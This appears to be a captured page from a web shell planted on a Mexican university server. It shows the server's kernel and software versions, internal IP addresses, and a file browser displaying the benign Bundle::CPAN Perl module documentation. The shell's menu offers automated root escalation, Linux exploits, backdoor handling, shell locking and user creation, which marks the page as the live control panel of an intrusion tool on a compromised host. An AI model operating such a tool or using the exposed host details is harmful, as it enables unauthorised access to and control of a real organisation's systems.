Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
perl5 /
site_perl /
5.34.1 /
Bundle /
[ HOME SHELL ]
Name
Size
Permission
Action
CPAN.pm
1.76
KB
-r--r--r--
CPANxxl.pm
968
B
-r--r--r--
LWP.pm
923
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CPAN.pm
package Bundle::CPAN; use strict; use vars qw($VERSION); $VERSION = '1.861'; # use 3 digits to minimize confusion with the # other CPAN.pm 1; __END__ =head1 NAME Bundle::CPAN - Bundle to optimize the behaviour of CPAN.pm =head1 SYNOPSIS perl -MCPAN -e 'install Bundle::CPAN' =head1 CONTENTS ExtUtils::MakeMaker -- bundles sane ExtUtils::Install Test::Harness -- critical prereq because must be >=2.62 ExtUtils::CBuilder -- some of the things below depend on it without declaring (as of 2006-10) File::Temp -- prereq Test::More -- prereq Data::Dumper IO::Compress::Base -- 2009-07-02, new master IO::Compress::* package, Compress::Zlib -- needed by Archive::Tar IO::Zlib -- needed by Archive::{Tar,Zip} Archive::Tar -- needed by Module::Build Module::Build -- needed by File::Spec File::Spec -- prereq Digest::SHA File::HomeDir Archive::Zip Net::FTP Term::ReadKey Term::ReadLine::Perl -- could be replaced by "readline" some time after 1.88 YAML -- user may have a preference for YAML::Syck but as a bundle we don't know Parse::CPAN::Meta -- 2009-07-02: 5.6.2 currently has no YAML Text::Glob CPAN File::Which =head1 DESCRIPTION This bundle includes CPAN.pm as the base module. When CPAN installs this bundle it tries immediately to enable Term::ReadLine so that you do not need to restart your CPAN session. In this bundle Term::ReadLine::Perl is preferred over Term::ReadLine::Gnu because there is no way to express I<OR> in dependencies. Note that all modules in this Bundle are not strict prerequisites to get a working CPAN.pm. CPAN.pm can work quite well without the other modules. The other modules are B<suggested> and can safely be installed later. Please install the Bundle::CPANxxl to get a few more. =head1 AUTHOR Andreas Koenig
Close